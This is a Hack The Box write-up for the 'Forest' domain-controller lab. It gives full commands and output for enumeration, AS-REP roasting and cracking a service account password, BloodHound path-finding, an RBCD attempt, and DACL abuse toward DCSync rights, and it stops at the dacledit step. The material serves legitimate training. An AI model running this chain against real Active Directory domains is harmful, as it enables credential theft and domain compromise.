# Forest - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Forest was an excellent easy-rated HTB Windows machine created by [egre55](https://app.hackthebox.com/users/1190) and [mrb3n](https://app.hackthebox.com/users/2984)

For foothold, we enumerate usernames through a null RPC session and use them for ASREProasting.  
For root, we exploit DACLs: `GenericAll` over a group which, in turn, had `WriteDacl` over the domain object.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up (0.088s latency).
Not shown: 65511 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49676/tcp open  unknown
49677/tcp open  unknown
49684/tcp open  unknown
49703/tcp open  unknown
49941/tcp open  unknown
```

```console
opcode@parrot$ nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49676,49677,49684,49703,49941 -oN forest.nmap 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up (0.084s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-24 07:19:38Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49684/tcp open  msrpc        Microsoft Windows RPC
49703/tcp open  msrpc        Microsoft Windows RPC
49941/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2023-07-24T00:20:29-07:00
|_clock-skew: mean: 2h26m51s, deviation: 4h02m29s, median: 6m50s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-time: 
|   date: 2023-07-24T07:20:30
|_  start_date: 2023-07-23T23:30:33
```

Several ports are open, including DNS, Kerberos, SMB, RPC, LDAP and WinRM. It's likely a DC.

We can start with LDAP enumeration:

```console
opcode@parrot$ ldapsearch -x -H ldap://10.10.10.161 -s base -b "" -LLL
dn:
currentTime: 20230724072016.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=htb,DC=local
dsServiceName: CN=NTDS Settings,CN=FOREST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=htb,DC=local
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
defaultNamingContext: DC=htb,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=htb,DC=local
configurationNamingContext: CN=Configuration,DC=htb,DC=local
rootDomainNamingContext: DC=htb,DC=local
[--SNIP--]
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: FOREST.htb.local
ldapServiceName: htb.local:forest$@HTB.LOCAL
serverName: CN=FOREST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=htb,DC=local
[--SNIP--]
```

We have the FQDN `FOREST.htb.local` here; we can add it to `/etc/hosts`:

```text
10.10.10.161 FOREST.htb.local htb.local
```

## SMB enumeration

We can enumerate SMB shares. `CrackMapExec` is my tool of choice these days:

```console
opcode@parrot$ docker run -it --entrypoint=/bin/bash --rm --name cmexec cme:latest
root@93e576ba05b4:~# echo '10.10.10.161 FOREST.htb.local htb.local' >> /etc/hosts
```

Testing for null session:

```console
root@93e576ba05b4:~# cme smb 10.10.10.161 -d htb.local -u '' -p '' --shares
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.161    445    FOREST           [+] htb.local\: 
SMB         10.10.10.161    445    FOREST           [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

Null sessions are disabled.

Testing for guest session:

```console
root@93e576ba05b4:~# cme smb 10.10.10.161 -d htb.local -u 'opcode' -p '' --shares
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.161    445    FOREST           [-] htb.local\opcode: STATUS_LOGON_FAILURE
```

Guest sessions are disabled.

Also, note that SMBv1 is enabled. I thought of [Eternalblue](https://github.com/worawit/MS17-010), but it requires access to `IPC$`.

We can also try [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) for more enumeration:

```console
opcode@parrot$ python3 enum4linux-ng.py 10.10.10.161
```

Among all information, it also dumps a list of users and groups.  
Since the entire scan result is too long, let's look at users:

```text
 =====================================
|    Users via RPC on 10.10.10.161    |
 =====================================
[*] Enumerating users via 'querydispinfo'
[+] Found 31 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 31 user(s) via 'enumdomusers'
[+] After merging user results we have 31 user(s) total:
'1123':
  username: $331000-VK4ADACQNUCA
  name: (null)
  acb: '0x00020015'
  description: (null)
'1124':
  username: SM_2c8eef0a09b545acb
  name: Microsoft Exchange Approval Assistant
  acb: '0x00020011'
  description: (null)
'1125':
  username: SM_ca8c2ed5bdab4dc9b
  name: Microsoft Exchange
  acb: '0x00020011'
  description: (null)
[--SNIP--]
'1135':
  username: HealthMailboxfc9daad
  name: HealthMailbox-EXCH01-001
  acb: '0x00000210'
  description: (null)
[--SNIP--]
'1145':
  username: sebastien
  name: Sebastien Caron
  acb: '0x00000210'
  description: (null)
'1146':
  username: lucinda
  name: Lucinda Berger
  acb: '0x00000210'
  description: (null)
'1147':
  username: svc-alfresco
  name: svc-alfresco
  acb: '0x00010210'
  description: (null)
'1150':
  username: andy
  name: Andy Hislip
  acb: '0x00000210'
  description: (null)
'1151':
  username: mark
  name: Mark Brandt
  acb: '0x00000210'
  description: (null)
'1152':
  username: santi
  name: Santi Rodriguez
  acb: '0x00000210'
  description: (null)
'500':
  username: Administrator
  name: Administrator
  acb: '0x00000010'
  description: Built-in account for administering the computer/domain
'501':
  username: Guest
  name: (null)
  acb: '0x00000215'
  description: Built-in account for guest access to the computer/domain
'502':
  username: krbtgt
  name: (null)
  acb: '0x00000011'
  description: Key Distribution Center Service Account
'503':
  username: DefaultAccount
  name: (null)
  acb: '0x00000215'
  description: A user account managed by the system.
```

## ASREProast

Now that we have a bunch of usernames, we can try roasting AS-REPs:

```console
opcode@parrot$ GetNPUsers.py htb.local/ -usersfile users.txt
Impacket v0.10.1.dev1+20230223.202738.f4b848fa - Copyright 2022 Fortra

[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:2afb1cc1eefa35ef3405b6808057a57d$d163368ebc2b94fa6269a752e015174f39db5b2f7766c0e1aa4012c0cb2ef70dcd959f116d8a375a500c8de6a481a2c2133c4f7144521dbf6b05fb7645475e012fb0dbee0faa604d6a57d78a21bbbe4cfb732770d9ebfbfef2e300c7d977c065e0d3ae1999aa4f7f12c6188f8173e889f5aa25c3bed52eb2e6f74b7a96d9b57406429022ee00707334cd3281c588b281be30e650c583f9f0ec0486cbaf8190c1b064b584581f0c073d3208dbdc71e7d633e4b1e251e3a74ec14fd752ba911cf10b1de8c1d5d88ae597d8029449e3d0efee3c295d80c8b8b711e2a1c8b61e4610dbc80fb45b58
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
```

Success! Now crack the hash with john:

```
opcode@parrot$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

It immediately cracks, and we get a set of credentials:

```text
svc-alfresco:s3rvice
```

## AD enumeration

With creds, we can enumerate more:

```console
root@28b2041721c5:~# cme smb 10.10.10.161 -d htb.local -u 'svc-alfresco' -p 's3rvice' --shares
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.161    445    FOREST           [+] htb.local\svc-alfresco:s3rvice 
SMB         10.10.10.161    445    FOREST           [*] Enumerated shares
SMB         10.10.10.161    445    FOREST           Share           Permissions     Remark
SMB         10.10.10.161    445    FOREST           -----           -----------     ------
SMB         10.10.10.161    445    FOREST           ADMIN$                          Remote Admin
SMB         10.10.10.161    445    FOREST           C$                              Default share
SMB         10.10.10.161    445    FOREST           IPC$                            Remote IPC
SMB         10.10.10.161    445    FOREST           NETLOGON        READ            Logon server share 
SMB         10.10.10.161    445    FOREST           SYSVOL          READ            Logon server share 
```

Nothing useful in SMB.

```console
root@28b2041721c5:~# cme winrm 10.10.10.161 -d htb.local -u 'svc-alfresco' -p 's3rvice'
HTTP        10.10.10.161    5985   10.10.10.161     [*] http://10.10.10.161:5985/wsman
HTTP        10.10.10.161    5985   10.10.10.161     [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
```

But it works with WinRM: `svc-alfresco` is a member of "Remote Management Users" group.

I also like to check a few other things to get more information:

```console
root@28b2041721c5:~# cme smb 10.129.95.210 -d htb.local -u 'svc-alfresco' -p 's3rvice' --rid-brute 10000
SMB         10.129.95.210   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.129.95.210   445    FOREST           [+] htb.local\svc-alfresco:s3rvice 
SMB         10.129.95.210   445    FOREST           498: HTB\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           500: HTB\Administrator (SidTypeUser)
SMB         10.129.95.210   445    FOREST           501: HTB\Guest (SidTypeUser)
SMB         10.129.95.210   445    FOREST           502: HTB\krbtgt (SidTypeUser)
SMB         10.129.95.210   445    FOREST           503: HTB\DefaultAccount (SidTypeUser)
SMB         10.129.95.210   445    FOREST           512: HTB\Domain Admins (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           513: HTB\Domain Users (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           514: HTB\Domain Guests (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           515: HTB\Domain Computers (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           516: HTB\Domain Controllers (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           517: HTB\Cert Publishers (SidTypeAlias)
SMB         10.129.95.210   445    FOREST           518: HTB\Schema Admins (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           519: HTB\Enterprise Admins (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           520: HTB\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           521: HTB\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           522: HTB\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           525: HTB\Protected Users (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           526: HTB\Key Admins (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           527: HTB\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           553: HTB\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.95.210   445    FOREST           571: HTB\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.95.210   445    FOREST           572: HTB\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.95.210   445    FOREST           1000: HTB\FOREST$ (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1101: HTB\DnsAdmins (SidTypeAlias)
SMB         10.129.95.210   445    FOREST           1102: HTB\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1103: HTB\EXCH01$ (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1104: HTB\Organization Management (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1105: HTB\Recipient Management (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1106: HTB\View-Only Organization Management (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1107: HTB\Public Folder Management (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1108: HTB\UM Management (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1109: HTB\Help Desk (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1110: HTB\Records Management (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1111: HTB\Discovery Management (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1112: HTB\Server Management (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1113: HTB\Delegated Setup (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1114: HTB\Hygiene Management (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1115: HTB\Compliance Management (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1116: HTB\Security Reader (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1117: HTB\Security Administrator (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1118: HTB\Exchange Servers (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1119: HTB\Exchange Trusted Subsystem (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1120: HTB\Managed Availability Servers (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1121: HTB\Exchange Windows Permissions (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1122: HTB\ExchangeLegacyInterop (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1123: HTB\$331000-VK4ADACQNUCA (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1124: HTB\SM_2c8eef0a09b545acb (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1125: HTB\SM_ca8c2ed5bdab4dc9b (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1126: HTB\SM_75a538d3025e4db9a (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1127: HTB\SM_681f53d4942840e18 (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1128: HTB\SM_1b41c9286325456bb (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1129: HTB\SM_9b69f1b9d2cc45549 (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1130: HTB\SM_7c96b981967141ebb (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1131: HTB\SM_c75ee099d0a64c91b (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1132: HTB\SM_1ffab36a2f5f479cb (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1133: HTB\$D31000-NSEL5BRJ63V7 (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1134: HTB\HealthMailboxc3d7722 (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1135: HTB\HealthMailboxfc9daad (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1136: HTB\HealthMailboxc0a90c9 (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1137: HTB\HealthMailbox670628e (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1138: HTB\HealthMailbox968e74d (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1139: HTB\HealthMailbox6ded678 (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1140: HTB\HealthMailbox83d6781 (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1141: HTB\HealthMailboxfd87238 (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1142: HTB\HealthMailboxb01ac64 (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1143: HTB\HealthMailbox7108a4e (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1144: HTB\HealthMailbox0659cc1 (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1145: HTB\sebastien (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1146: HTB\lucinda (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1147: HTB\svc-alfresco (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1148: HTB\Service Accounts (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1149: HTB\Privileged IT Accounts (SidTypeGroup)
SMB         10.129.95.210   445    FOREST           1150: HTB\andy (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1151: HTB\mark (SidTypeUser)
SMB         10.129.95.210   445    FOREST           1152: HTB\santi (SidTypeUser)
SMB         10.129.95.210   445    FOREST           5101: HTB\test (SidTypeGroup)
```

```console
root@28b2041721c5:~# cme ldap 10.129.95.210 -d htb.local -u 'svc-alfresco' -p 's3rvice' -M adcs
SMB         10.129.95.210   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP        10.129.95.210   389    FOREST           [+] htb.local\svc-alfresco:s3rvice
ADCS        10.129.95.210   389    FOREST           [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'

root@28b2041721c5:~# cme ldap 10.129.95.210 -d htb.local -u 'svc-alfresco' -p 's3rvice' -M maq
SMB         10.129.95.210   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP        10.129.95.210   389    FOREST           [+] htb.local\svc-alfresco:s3rvice
MAQ         10.129.95.210   389    FOREST           [*] Getting the MachineAccountQuota
MAQ         10.129.95.210   389    FOREST           MachineAccountQuota: 10
```

And some groups:

```console
root@28b2041721c5:~# cme ldap 10.129.95.210 -d htb.local -u 'svc-alfresco' -p 's3rvice' -M group-mem -o group='Remote Management Users'
SMB         10.129.95.210   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP        10.129.95.210   389    FOREST           [+] htb.local\svc-alfresco:s3rvice
GROUP-ME... 10.129.95.210   389    FOREST           [+] Found the following members of the Remote Management Users group:
GROUP-ME... 10.129.95.210   389    FOREST           Privileged IT Accounts

root@28b2041721c5:~# cme ldap 10.129.95.210 -d htb.local -u 'svc-alfresco' -p 's3rvice' -M group-mem -o group='Domain Admins'
SMB         10.129.95.210   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP        10.129.95.210   389    FOREST           [+] htb.local\svc-alfresco:s3rvice 
GROUP-ME... 10.129.95.210   389    FOREST           [+] Found the following members of the Domain Admins group:
GROUP-ME... 10.129.95.210   389    FOREST           Administrator

root@28b2041721c5:~# cme ldap 10.129.95.210 -d htb.local -u 'svc-alfresco' -p 's3rvice' -M group-mem -o group='Protected Users'
SMB         10.129.95.210   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP        10.129.95.210   389    FOREST           [+] htb.local\svc-alfresco:s3rvice 

root@28b2041721c5:~# cme ldap 10.129.95.210 -d htb.local -u 'svc-alfresco' -p 's3rvice' -M group-mem -o group='Domain Computers'
SMB         10.129.95.210   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP        10.129.95.210   389    FOREST           [+] htb.local\svc-alfresco:s3rvice 
GROUP-ME... 10.129.95.210   389    FOREST           [+] Found the following members of the Domain Computers group:
GROUP-ME... 10.129.95.210   389    FOREST           EXCH01$

root@28b2041721c5:~# cme ldap 10.129.95.210 -d htb.local -u 'svc-alfresco' -p 's3rvice' -M group-mem -o group='Privileged IT Accounts'
SMB         10.129.95.210   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP        10.129.95.210   389    FOREST           [+] htb.local\svc-alfresco:s3rvice 
GROUP-ME... 10.129.95.210   389    FOREST           [+] Found the following members of the Privileged IT Accounts group:
GROUP-ME... 10.129.95.210   389    FOREST           Service Accounts

root@28b2041721c5:~# cme ldap 10.129.95.210 -d htb.local -u 'svc-alfresco' -p 's3rvice' -M group-mem -o group='Service Accounts'
SMB         10.129.95.210   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP        10.129.95.210   389    FOREST           [+] htb.local\svc-alfresco:s3rvice 
GROUP-ME... 10.129.95.210   389    FOREST           [+] Found the following members of the Service Accounts group:
GROUP-ME... 10.129.95.210   389    FOREST           svc-alfresco

root@28b2041721c5:~# cme ldap 10.129.95.210 -d htb.local -u 'svc-alfresco' -p 's3rvice' -M group-mem -o group='test'
SMB         10.129.95.210   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP        10.129.95.210   389    FOREST           [+] htb.local\svc-alfresco:s3rvice 
```

Next, we can try looking for possible exploit paths with Bloodhound.  
A python-based ingestor (<https://github.com/fox-it/bloodhound.py>) can be used:

```console
opcode@parrot$ sudo ntpdate htb.local
opcode@parrot$ bloodhound-python -u svc-alfresco -p s3rvice -ns 10.10.10.161 -d htb.local -c All --zip
```

We can now start neo4j with:

```console
opcode@parrot$ sudo neo4j console
```

Finally, we can run the BloodHound binary:

```console
opcode@parrot$ ./BloodHound
```

Once on the interface, we can select "Upload Data" and select the zip file generated by the ingestor.  
We can search for `SVC-ALFRESCO@ACTIVE.HTB` and mark it as owned.  
There are no kerberoastable users, but if we query the "Shortest path from Owned Principals", we'd get a graph:

![1](images/1.png)

`SVC-ALFRESCO` belongs to the group `SERVICE ACCOUNTS`, which belongs to the group `PRIVILEGED IT ACCOUNTS`.  
The members of `PRIVILEGED IT ACCOUNTS` have `CanPSRemote`. We already know that we are in "Remote Management Users" group.  
Conversely, `PRIVILEGED IT ACCOUNTS` belong to the `ACCOUNT OPERATORS` group.  
Members of `ACCOUNT OPERATORS` have `GenericAll` over the machine account `EXCH01.HTB.LOCAL`

## Resource Based Constrained Delegation

If we have `GenericAll` over a machine account, we can go for Resource-based Constrained Delegation.  
There are multiple tools to do it, but the most effortless approach is to use [Impacket](https://github.com/SecureAuthCorp/impacket)

First, we need to check if we can add more machine accounts or not:

```console
opcode@parrot$ ldapsearch -LLL -x -h 10.10.10.161 -D 'svc-alfresco' -w 's3rvice' -b "dc=htb,dc=local" "(ms-DS-MachineAccountQuota=*)" ms-DS-MachineAccountQuota
dn: DC=htb,DC=local
ms-DS-MachineAccountQuota: 10

# refldap://ForestDnsZones.htb.local/DC=ForestDnsZones,DC=htb,DC=local

# refldap://DomainDnsZones.htb.local/DC=DomainDnsZones,DC=htb,DC=local

# refldap://htb.local/CN=Configuration,DC=htb,DC=local
```

`ms-DS-MachineAccountQuota` is set to the default value of 10  
Therefore, we can create a new machine account

```console
opcode@parrot$ addcomputer.py -computer-name 'GLADOS$' -computer-pass 'TheCakeIsALie' -dc-ip 10.10.10.161 htb.local/svc-alfresco:s3rvice
Impacket v0.10.1.dev1+20230223.202738.f4b848fa - Copyright 2022 Fortra

[*] Successfully added machine account GLADOS$ with password TheCakeIsALie.
```


Now, we need to append the security descriptor of the machine account we created (`GLADOS$`), to the `EXCH01$` computer's `msDS-AllowedToActOnBehalfOfOtherIdentity`

```console
opcode@parrot$ rbcd.py -delegate-from 'GLADOS$' -delegate-to 'EXCH01$' -dc-ip 10.10.10.161 -action write htb.local/svc-alfresco:s3rvice
Impacket v0.10.1.dev1+20230223.202738.f4b848fa - Copyright 2022 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] GLADOS$ can now impersonate users on EXCH01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     GLADOS$      (S-1-5-21-3072663084-364016917-1341370565-9601)
```

We can verify that it worked:

```console
opcode@parrot$ rbcd.py -delegate-to 'EXCH01$' -dc-ip 10.10.10.161 -action read htb.local/svc-alfresco:s3rvice
Impacket v0.10.1.dev1+20230223.202738.f4b848fa - Copyright 2022 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*]     GLADOS$      (S-1-5-21-3072663084-364016917-1341370565-9601)
```

Finally, we can request impersonated Service Tickets (S4U) for the target computer:

```console
opcode@parrot$ sudo ntpdate htb.local
opcode@parrot$ getST.py -spn cifs/EXCH01.htb.local -impersonate Administrator -dc-ip 10.10.10.161 htb.local/GLADOS$:TheCakeIsALie
Impacket v0.10.1.dev1+20230223.202738.f4b848fa - Copyright 2022 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*]   Requesting S4U2self
[*]   Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
```

With the ticket, I tried to use Kerberos authentication with `psexec.py` to get a shell as system on `EXCH01$`:

```console
opcode@parrot$ sudo ntpdate htb.local
opcode@parrot$ export KRB5CCNAME=Administrator.ccache
opcode@parrot$ psexec.py -no-pass -k htb.local/administrator@EXCH01.htb.local
Impacket v0.10.1.dev1+20230223.202738.f4b848fa - Copyright 2022 Fortra

[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)
```

This ticket isn't of much use.

## Abusing `WriteDacl` over the domain object

With hints from my friends, I returned to look at Bloodhound graphs.  

If we search for `SVC-ALFRESCO@ACTIVE.HTB` and click on "Reachable high value targets", we'd get another graph:

![2](images/2.png)

There's nothing helpful in this one, either.

Under analysis, if we check "Shortest Paths to Domain Admins", we'd get this graph:

![3](images/3.png)

There's a lot of clutter, but starting from `SVC-ALFRESCO`, we'd find a juicy path.  
`ACCOUNT OPERATORS` have `GenericAll` over the `EXCHANGE WINDOWS PERMISSIONS` group, and members of that group have `WriteDacl` over the domain object `HTB.LOCAL`  
A friend taught me how to clean up this mess: if we mark the domain object `HTB.LOCAL` as ending node and mark `SVC-ALFRESCO` as starting node, we will get a much cleaner graph:

![4](images/4.png)

The first step is to abuse the `GenericAll` over `Exchange Windows Permissions` group and add ourselves.  
[Impacket](https://github.com/SecureAuthCorp/impacket) recently merged a `net.py` PR:

```console
opcode@parrot$ net.py -dc-ip 10.10.10.161 htb.local/svc-alfresco:s3rvice@forest.htb.local group -join 'svc-alfresco' -name 'Exchange Windows Permissions'
Impacket v0.10.1.dev1+20230718.100545.fdbd2568 - Copyright 2022 Fortra

[*] Adding user account 'Exchange Windows Permissions' to group 'svc-alfresco'
[+] User account added to Exchange Windows Permissions succesfully!
```

Don't mind the swapped user and group in the logs 🤣

Now that we are a member of `Exchange Windows Permissions`, we have `WriteDacl` over domain `HTB.LOCAL`  
We can use that to give DCSync rights to ourselves. `dacledit.py` is yet to be merged with `Impacket`.  
Therefore, we need to get the PR repo in a `venv`:

```console
opcode@parrot$ mkdir impacket_dacledit && cd impacket_dacledit
opcode@parrot$ python3 -m venv venv
opcode@parrot$ source venv/bin/activate
(venv) opcode@parrot$ git clone https://github.com/ShutdownRepo/impacket.git
(venv) opcode@parrot$ cd impacket
(venv) opcode@parrot$ git checkout origin/dacledit
(venv) opcode@parrot$ python3 -m pip install -r requirements.txt
(venv) opcode@parrot$ python3 -m pip install .
```

With the setup out of the way, we can run the command:

```console
(venv) opcode@parrot$ dacledit.py -action write -rights DCSync -principal svc-alfresco -target 'htb.local' -dc-ip 10.10.10.161 htb.local/svc-alfresco:s3rvice
